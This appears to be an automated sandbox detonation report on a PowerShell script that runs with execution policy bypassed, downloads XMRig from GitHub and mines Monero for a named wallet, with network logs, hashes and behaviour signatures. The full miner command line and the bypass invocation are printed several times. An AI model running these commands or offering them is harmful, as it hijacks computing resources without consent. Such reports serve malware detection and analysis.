C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/2280-4-0x00007FFBE4F73000-0x00007FFBE4F74000-memory.dmp

memory/2280-5-0x00000222EBCD0000-0x00000222EBCF2000-memory.dmp

memory/2280-6-0x00007FFBE4F70000-0x00007FFBE595C000-memory.dmp

memory/2280-10-0x00000222EBE90000-0x00000222EBF06000-memory.dmp

memory/2280-9-0x00007FFBE4F70000-0x00007FFBE595C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkfnjvea.x5d.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2280-25-0x00007FFBE4F70000-0x00007FFBE595C000-memory.dmp

memory/2280-48-0x00000222EBE60000-0x00000222EBE72000-memory.dmp

memory/2280-61-0x00000222EBE40000-0x00000222EBE4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1272-90-0x0000014229630000-0x0000014229650000-memory.dmp

memory/1272-91-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-92-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/2280-93-0x00007FFBE4F73000-0x00007FFBE4F74000-memory.dmp

memory/2280-94-0x00007FFBE4F70000-0x00007FFBE595C000-memory.dmp

memory/1272-95-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-96-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-97-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-98-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-99-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-100-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-101-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-102-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-103-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-104-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-105-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-106-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-107-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-108-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-109-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-110-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-111-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-112-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-113-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-114-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-115-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-116-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-117-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-118-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-119-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-120-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-121-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-122-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-123-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-124-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-125-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-126-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-127-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-128-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-129-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-130-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-131-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-132-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-133-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-134-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-135-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-136-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-137-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-138-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-139-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-140-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-141-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-142-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-143-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-144-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-145-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-146-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-147-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-148-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-149-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-150-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-151-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-152-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-153-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-154-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

memory/1272-155-0x00007FF7DD700000-0x00007FF7DE333000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

memory/3948-0-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/3948-6-0x000002A6B3C70000-0x000002A6B3C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tf21wm35.rjh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3948-11-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/3948-12-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/3948-14-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/3948-15-0x000002A6B3CC0000-0x000002A6B3CD2000-memory.dmp

memory/3948-16-0x000002A6B3CA0000-0x000002A6B3CAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/232-47-0x0000025856AF0000-0x0000025856B10000-memory.dmp

memory/232-48-0x0000025858600000-0x0000025858620000-memory.dmp

memory/232-49-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-50-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-51-0x0000025858620000-0x0000025858640000-memory.dmp

memory/3948-52-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/3948-53-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/232-54-0x0000025858640000-0x0000025858660000-memory.dmp

memory/232-55-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-57-0x0000025858620000-0x0000025858640000-memory.dmp

memory/232-56-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-58-0x0000025858640000-0x0000025858660000-memory.dmp

memory/232-59-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-60-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-61-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-62-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-63-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-64-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-65-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-66-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-67-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-68-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-69-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-70-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-71-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-72-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-73-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-74-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-75-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-76-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-77-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-78-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-79-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-80-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-81-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-82-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-83-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-84-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-85-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-86-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-87-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-88-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-89-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-90-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-91-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-92-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-93-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-94-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-95-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-96-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-97-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-98-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-99-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-100-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-101-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-102-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-103-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-104-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-105-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-106-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-107-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-108-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-109-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-110-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-111-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-112-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-113-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-114-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-115-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-116-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

memory/232-117-0x00007FF6CC150000-0x00007FF6CCD83000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:43

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/512-3-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp

memory/512-5-0x0000027A39A40000-0x0000027A39A62000-memory.dmp

memory/512-8-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-9-0x0000027A52210000-0x0000027A52286000-memory.dmp

memory/512-10-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0bq0a24r.rd3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/512-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/512-29-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp

memory/512-49-0x0000027A52070000-0x0000027A52082000-memory.dmp

memory/512-62-0x0000027A39AA0000-0x0000027A39AAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3812-91-0x000002748E030000-0x000002748E050000-memory.dmp

memory/512-92-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/3812-93-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/512-94-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp

memory/3812-95-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-96-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-97-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-98-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-99-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-100-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-101-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-102-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-103-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-104-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-105-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-106-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-107-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-108-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-109-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-110-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-111-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-112-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-113-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-114-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-115-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-116-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-117-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-118-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-119-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-120-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-121-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-122-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-123-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-124-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-125-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-126-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-127-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-128-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-129-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

memory/3812-130-0x00007FF7BFEC0000-0x00007FF7C0AF3000-memory.dmp

